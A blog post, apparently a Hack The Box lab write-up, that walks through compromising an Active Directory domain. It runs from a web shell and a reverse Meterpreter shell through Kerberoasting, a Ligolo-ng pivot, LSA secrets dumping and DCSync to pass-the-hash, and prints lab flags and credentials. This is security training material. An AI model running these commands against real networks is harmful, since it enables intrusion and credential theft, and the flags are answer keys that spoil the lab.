Skip to main content
HashnodeActive Directory Attack Walkthroughs

Command Palette

Search for a command to run...

HTB - AD Enumeration & Attacks - Skills Assessment Part I

Updated
5 min read
S
Sanjit Das

Scenario Overview

During an external penetration test, a team member exploited a file upload vulnerability on a public-facing web server and deployed a password-protected web shell in the /uploads directory.

The lab provides the following credentials for access: admin:My_W3bsH3ll_P@ssw0rd!

Starting from this foothold, the objective is to enumerate the Active Directory environment, identify flaws and misconfigurations, move laterally, and ultimately achieve domain compromise.

Attack Chain

The following attack chain summarizes the steps taken from initial access to domain compromise.

Web Shell Access → SYSTEM on WEB-WIN01 → Kerberoasting (svc_sql) → Cracked Credentials → Pivoting → Admin Access on MS01 → LSA Secrets Dump → New Credentials (tpetty) → DCSync → Domain Compromise

Lab Walkthrough

1. Submit the contents of the flag.txt file on the administrator Desktop of the web server

I accessed the web shell at http://<IP>/uploads/antak.aspx and authenticated using the provided credentials admin:My_W3bsH3ll_P@ssw0rd!.

After logging in, I gathered basic system information by running
hostname ; whoami ; Get-NetIPAddress -AddressFamily IPv4 | Where-Object { \(_.PrefixOrigin -ne 'WellKnown' -and \)_.InterfaceAlias -notlike '*Loopback*' } | Select-Object IPAddress.

The output showed that the server was WEB-WIN01, and the shell was running as NT AUTHORITY\SYSTEM. It also revealed two network interfaces: 172.16.6.100 and 10.129.133.21.

Next, I retrieved the flag from the Administrator’s desktop using
cat C:\Users\Administrator\Desktop\flag.txt, which returned JusT_g3tt1ng_st@rt3d!.

2. Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

Obtaining a Reverse Shell

To gain a more stable shell, I used the Metasploit web_delivery module to generate a Meterpreter reverse shell.
First, I started Metasploit and configured the module:

sudo msfconsole -q
use exploit/multi/script/web_delivery
set payload payload/windows/meterpreter_reverse_tcp
set target PSH\ (Binary)
set lhost tun0
set srvhost tun0
set PSH-ENCODEDCOMMAND false
run

The module generated a PowerShell command that downloads and executes a payload from my machine. I executed this command through the web shell, which established a Meterpreter session on the target system.

Transferring PowerView

I transferred PowerView to the target machine for enumeration. First, I started a simple Python web server on my machine using python3 -m http.server 80. From the Meterpreter shell, I used PowerShell to download PowerView.ps1 from my local machine.

powershell -ep bypass
iwr -Uri http://<localIP>/PowerView.ps1 -OutFile PowerView.ps1

Enumerating Service Accounts

After importing PowerView, I searched for accounts with Service Principal Names (SPNs), which can be targeted for Kerberoasting.

. .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

This returned several service accounts, including svc_sql, which is the account we are interested in.

3. Crack the account's password. Submit the cleartext value.

Next, I retrieved the TGS ticket for the svc_sql account in Hashcat format using the following command:

Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat

I then cracked the Kerberos hash using Hashcat, which revealed the password lucky7.

hashcat -m 13100 svc_sql_kerb.txt /usr/share/wordlists/rockyou.txt

4. Submit the contents of the flag.txt file on the Administrator desktop on MS01

I pinged MS01 to obtain its IP address.

Pivoting to the Internal Network

The host MS01 (172.16.6.50) was located on the internal network. To access it, I pivoted through the compromised web server using Ligolo-ng.

First, on my local machine I created a TUN interface, brought it up, and started the Ligolo proxy:

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:9001

Next, on the compromised web server, I executed the Ligolo agent to connect back to my proxy:

agent.exe -connect <localIP>:9001 -ignore-cert

On my local machine, I selected the active Ligolo session and checked the network interfaces of the compromised host using the ifconfig command. The output showed that the web server had two interfaces, including 172.16.6.100, confirming access to the internal network.

Next, on my local machine I added a route to the internal network through the Ligolo interface:

sudo ip route add 172.16.6.0/24 dev ligolo

Finally, from the Ligolo proxy session, I started the tunnel using the start command.

After establishing the pivot, I scanned the MS01 host to identify exposed services:

sudo nmap 172.16.6.50 -p445,3389 -sV

Since RDP was open on MS01, I tested the previously cracked svc_sql credentials using the nxc command:

nxc rdp 172.16.6.50 -u svc_sql -p lucky7

The output showed “Pwn3d!”, indicating administrative access on the host.

Since the credentials were valid, I connected to MS01 via RDP using the following command:

xfreerdp3 /dynamic-resolution +clipboard /cert:ignore /v:172.16.6.50 /u:svc_sql /p:lucky7

After logging in, I retrieved the flag: spn$_r0ast1ng_on_@n_0p3n_f1re.

5. Find cleartext credentials for another domain user. Submit the username as your answer.

Since I had administrative access on MS01, I used nxc to dump LSA secrets from the host:

sudo nxc smb 172.16.6.50 -u svc_sql -p lucky7 --lsa

This revealed another set of credentials: tpetty:Sup3rS3cur3D0m@inU2eR.

6. Submit this user's cleartext password.

Sup3rS3cur3D0m@inU2eR

7. What attack can this user perform?

Next, I collected Active Directory data using BloodHound:

sudo bloodhound-python -u 'svc_sql' -p 'lucky7' -ns 172.16.6.3 -d INLANEFREIGHT.LOCAL -c all

After analyzing the data in BloodHound, I discovered that the user tpetty had the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All permissions on the INLANEFREIGHT.LOCAL domain.

These permissions allow a user to perform a DCSync attack, which can be used to replicate password hashes from the Domain Controller.

8. Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

I used the following command to perform a DCSync attack and dump password hashes from the Domain Controller:

impacket-secretsdump -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/tpetty@172.16.6.3

Now that I have the Administrator NTLM hash, I used the following command to obtain a shell on the Domain Controller:

impacket-psexec administrator@172.16.6.3 -hashes :27dedb1dab4d8545c6e1c66fba077da0

After gaining access, I collected the flag: r3plicat1on_m@st3r!.

#active-directory-attacks#network-penetration-testing

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

Active Directory Attack Walkthroughs

2 posts